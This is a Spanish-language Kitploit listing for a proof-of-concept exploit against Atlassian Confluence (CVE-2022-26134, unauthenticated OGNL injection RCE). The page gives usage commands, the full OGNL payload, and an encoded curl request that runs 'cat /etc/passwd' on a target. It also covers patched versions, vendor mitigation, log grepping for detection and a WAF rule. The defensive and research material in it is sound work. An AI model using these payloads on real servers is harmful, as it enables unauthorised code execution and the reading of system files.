Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-26134 — Atlassian Confluence (CVE-2022-26134) - Vulnerabilidad de inyección OGNL no autenticada (RCE). | Kitploit
Herramientas/GitHubGitHub/debajyoti0-0/cve-2022-26134
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubdebajyoti0-0/cve-2022-26134

CVE-2022-26134

Atlassian Confluence (CVE-2022-26134) - Vulnerabilidad de inyección OGNL no autenticada (RCE).

Ver Repositorio
31hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-26134 - Vulnerabilidad de inyección OGNL:

Script de prueba de concepto que explota la vulnerabilidad de ejecución remota de código que afecta a Atlassian Confluence 7.18 y versiones anteriores. La vulnerabilidad de inyección OGNL permite a un usuario no autenticado ejecutar código arbitrario en una instancia de Confluence Server o Data Center.

Versiones afectadas:

Todas las versiones compatibles de Confluence Server y Data Center están afectadas.
Las versiones de Confluence Server y Data Center posteriores a 1.3.0 e inferiores a 7.18.1 están afectadas.
La vulnerabilidad tiene una puntuación CVSS de 10 sobre 10 en criticidad.

Dependencias:

  • Python 3.3+
  • Las dependencias se pueden instalar mediante
root@kitploit:~
pip install -r requirements.txt

Cómo usar:

Clona el repositorio:

root@kitploit:~
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134

Luego puedes ejecutar el exploit con el comando de tu elección de la siguiente manera:

root@kitploit:~
python3 cve-2022-26134.py https://target.com "id"
python3 cve-2022-26134.py https://target.com "ps aux"
python3 cve-2022-26134.py https://target.com "cat /etc/passwd"

Payload:

root@kitploit:~
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Ejemplo con comando CURL:

root@kitploit:~
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

Luego, el resultado del comando se reflejará en el parámetro X-Cmd-Response en la cabecera de respuesta.

Guías de mitigación de los proveedores:

Sigue las recomendaciones oficiales de Atlassian:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

Parcheo:

Atlassian ha publicado un aviso para sus productos afectados por este CVE, que puedes leer aquí. Para resolver el problema, debes actualizar tu versión de Confluence. La lista sugerida en el momento de la publicación es:

  • 7.4.17
  • 7.13.7
  • 7.14.3
  • 7.15.2
  • 7.16.4
  • 7.17.4
  • 7.18.1

Detección - Archivos de registro:

Confluence es un servidor Apache Tomcat que tiene registros en /opt/atlassian/confluence/logs. Puedes usar comandos como grep para buscar solicitudes HTTP GET de payloads que utilicen el runtime de Java para ejecutar comandos. Por ejemplo:

grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" en catalina.out

Capacidades de detección:

Esta vulnerabilidad afecta a todas las instancias autoalojadas. Si usas un WAF, puedes bloquear URLs que contengan ${ dentro.

YARA (por Volexity): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar

Material de lectura adicional:

  • Entrada de la Base de Datos Nacional de Vulnerabilidades NIST (CVE-2022-26134)
  • Cazando el RCE de Confluence [CVE-2022–26134]
  • Explorando y remediando el RCE de Confluence
  • ¿Qué es la inyección OGNL?
  • Citrix: Guía para reducir el riesgo de RCE por inyección OGNL no autenticada
  • Explorando la inyección OGNL en Apache Struts

Nota:

SOLO CON FINES EDUCATIVOS.

CVE-2022-26134 meme fire

Descargar herramienta